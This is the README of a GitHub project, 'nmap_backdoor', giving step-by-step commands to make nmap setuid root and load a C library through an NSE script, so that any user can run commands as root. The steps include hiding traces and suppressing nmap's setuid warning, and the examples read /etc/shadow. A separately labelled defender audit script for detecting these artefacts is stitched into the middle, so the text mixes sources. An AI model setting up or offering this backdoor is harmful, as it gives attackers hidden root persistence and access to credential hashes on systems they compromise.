azuk4r/nmap_backdoor

Nmap backdoor

Backdoor that leverages Nmap with setuid permissions to execute commands as root through a Lua-loaded C library

Steps

0. Required installs:

sudo apt install gcc libcap-dev liblua5.4-dev

1. Compilation:

gcc -shared -fPIC -o socket.so socket.c -I/usr/include/lua5.4 -llua5.4

2. Permissions:

sudo chmod 4755 /usr/bin/nmap

3. Prepare files:

sudo cp socket.nse /usr/share/nmap/scripts/ && sudo cp socket.so /usr/share/nmap/nselib/ && sudo nmap --script-updatedb

Or if you don't want to leave any traces of the files, you can use:

rm socket.c && sudo mv socket.nse /usr/share/nmap/scripts/ && sudo mv socket.so /usr/share/nmap/nselib/ && sudo nmap --script-updatedb

Optionally, if you want to suppress the warning nmap prints about the setuid bit, you can do something like this:

sudo mv /usr/bin/nmap /usr/bin/nmap_ && printf '%s\n' '#!/bin/bash' 'exec /usr/bin/nmap_ "$@" 2> >(grep -v -F "setuid" >&2)' | sudo tee /usr/bin/nmap > /dev/null && sudo chmod 755 /usr/bin/nmap

Example commands

nmap -p 631 --script socket.nse --script-args socket.command=whoami localhost

whoami

nmap -p 631 --script socket.nse --script-args socket.command="cat /etc/shadow" localhost

cat /etc/shadow

Notes

  • Commands are executed via popen(), which runs them through /bin/sh
  • If the command runs in an infinite loop, no output will be displayed
  • The method works regardless of the specified target or port (a single port is specified so the script, and therefore the command, runs only once)
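From the defender's side, the steps above leave three artefacts on a host: a setuid-root nmap binary (or a renamed one such as nmap_), a wrapper script at the nmap path that filters the word "setuid" out of stderr, and a native shared object in the NSE library directory, which normally holds only Lua files. The following audit script is an added example and not part of the nmap_backdoor project; the function names audit_nmap, make_fixture and count_findings and the optional prefix argument (used to point the check at a constructed fixture tree instead of the live filesystem) are assumptions of this example.

```shell
#!/bin/sh
# Defender-side audit for the artefacts described in the README steps.
# Added example, not part of the nmap_backdoor project.
# Usage: audit_nmap            -> checks the live filesystem
#        audit_nmap /some/root -> checks a prefixed tree (used for the fixture below)
audit_nmap() {
  root="${1:-}"
  findings=0
  bin="$root/usr/bin/nmap"
  nselib="$root/usr/share/nmap/nselib"

  # 1. setuid bit on the nmap binary or on a renamed original (nmap_)
  for f in "$bin" "${bin}_"; do
    [ -e "$f" ] || continue
    if [ -u "$f" ]; then
      echo "SETUID: $f"
      findings=$((findings + 1))
    fi
  done

  # 2. the nmap path is a script that mentions "setuid" (stderr-filtering wrapper)
  if [ -f "$bin" ] && head -c 2 "$bin" 2>/dev/null | grep -q '#!' && grep -q 'setuid' "$bin"; then
    echo "WRAPPER: $bin is a script referencing 'setuid'"
    findings=$((findings + 1))
  fi

  # 3. native shared objects inside nselib (legitimate nselib content is .lua)
  if [ -d "$nselib" ]; then
    for so in "$nselib"/*.so; do
      [ -e "$so" ] || continue
      echo "NATIVE_NSELIB: $so"
      findings=$((findings + 1))
    done
  fi

  echo "FINDINGS: $findings"
  return 0
}

# Constructed fixture reproducing the README's end state in a temp directory,
# so the audit can be exercised offline without touching the real /usr/bin.
make_fixture() {
  d=$(mktemp -d)
  mkdir -p "$d/usr/bin" "$d/usr/share/nmap/nselib" "$d/usr/share/nmap/scripts"
  printf 'placeholder-binary\n' > "$d/usr/bin/nmap_"
  chmod 4755 "$d/usr/bin/nmap_"
  printf '%s\n' '#!/bin/bash' 'exec /usr/bin/nmap_ "$@" 2> >(grep -v -F "setuid" >&2)' > "$d/usr/bin/nmap"
  chmod 755 "$d/usr/bin/nmap"
  : > "$d/usr/share/nmap/nselib/socket.so"
  echo "$d"
}

# Convenience: just the numeric finding count for a given root.
count_findings() {
  audit_nmap "$1" | sed -n 's/^FINDINGS: //p'
}

# Run directly: audit the fixture, then the live system.
if [ "${AUDIT_DEMO:-0}" = "1" ]; then
  fx=$(make_fixture)
  audit_nmap "$fx"
  audit_nmap
fi
```

A clean host yields FINDINGS: 0; a host prepared exactly as in the steps above yields the setuid hit on nmap_, the wrapper hit on nmap, and the socket.so hit in nselib. The same three conditions translate directly into a file-integrity or EDR rule: setuid bit on /usr/bin/nmap or /usr/bin/nmap_, a shebang at /usr/bin/nmap, and any .so under /usr/share/nmap/nselib.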

Credits

Thanks to the developers of all the modules used in this project, and special thanks to hackerfantastic for giving me some pointers to make this work and for telling me the story of the old method (patched about 20 years ago) that used sudo chmod 4755 /usr/bin/nmap, nmap --interactive, and !sh to get a root shell, which is the inspiration for this new one.

Disclaimer

This is a tool for educational / personal use only — the author is not responsible for any misuse

This work is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License (CC BY-NC-SA 4.0).
